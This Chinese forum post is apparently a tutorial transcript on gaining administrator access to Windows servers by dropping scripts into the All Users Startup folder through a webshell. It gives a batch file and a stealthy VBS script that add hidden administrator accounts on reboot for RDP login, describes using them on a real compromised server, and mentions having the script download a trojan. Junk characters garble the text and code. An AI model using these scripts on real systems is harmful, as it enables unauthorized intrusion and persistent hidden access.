- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是8 J4 C V+ s1 L
启动 提权: S+ \; h$ f& X
C:\Docume~1\All Users\「开始」菜单\程序\启动4 p# u6 c& Q+ ^; v
在这里必须有写入权限 否则此方法无效
: j( N: z$ v7 P6 F# U! k因为我是在网吧 这里显示不了路径
5 s% d* ^7 z8 M9 x: b- }我去服务器上演示给大家看
# N1 z" R6 U3 g7 Z4 X* F0 J( ?, C0 f) r大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
+ J) G+ V9 \: t$ z& |: e文件 从而运行我们的文件 y, x* \4 \" ]# Q4 [% ?2 }
这里有两中方式 第一种是批处理" p& R6 [- W( A# m
我们来看下目前 我机器上的用户组" c# h' |2 I& }+ e3 l+ S" O; }$ N. c8 X3 v
目前我们没有521这个用户 J+ J( F+ [5 o, z4 X
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示. B3 K" I3 a- m8 T2 l
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现1 n: D# s) L9 @
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
4 O0 L1 }& t% F. g大家看 已经成功加入了WMMY用户
! B7 |$ Y/ b" n, T3 @5 w7 g- a2 D) Z" |网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了3 i' U ]7 p5 n! l4 q1 q+ K6 b6 e
当前终端服务端口: 3389$ R: h# T( K! K& o7 E: I$ p2 E% E
系统自动登录功能未开启. B7 u F, c" Y. f4 [
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
" b5 ^. Z2 a( `# S& J% x# |$ AC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
/ M/ @( h& ^) P第一种隐蔽性太差 我们就用第二种吧
3 k6 `8 e7 g$ m) D已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去; N+ R- h. V% P' N
从而取得了3389的登陆权限3 s8 n& |9 v6 m! b- i% {% ^& G
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马; \0 V; G, N. U3 V' v( A2 M
基本原理都差不多 我就不多介绍了* C+ {1 @) d6 b+ ] h: g
教程结束```2 ? }* s8 e6 _7 F# t" ^
@echo off. {7 A1 r$ Q; j) R
net user 521 521 /add1 I* ]1 s- k: B8 Q' ~7 k' X
net localgroup administrators 521 /add
+ ? y& `6 Y- W: X
j- m1 _, A* E4 \+ v7 H& I non Error Resume next5 D$ B6 _3 U5 @& n( q
set wshshell=createobject("wscript.shell")* A: {, G9 ]5 I% v% J6 ]; R
a=wshshell.run("net user wmmy$ 1227 /add",0)
; E# j" m' i4 B0 R, Ta=wshshell.run("net localgroup administrators wmmy$ /add",0)
+ p+ h9 a# R u( X5 N
+ G* q; e$ o) j! I. Q
3 e) a! J, W# `: [! p点击下载
- l; g2 v, M# g& t, _ |
-
2
评分人数
-
|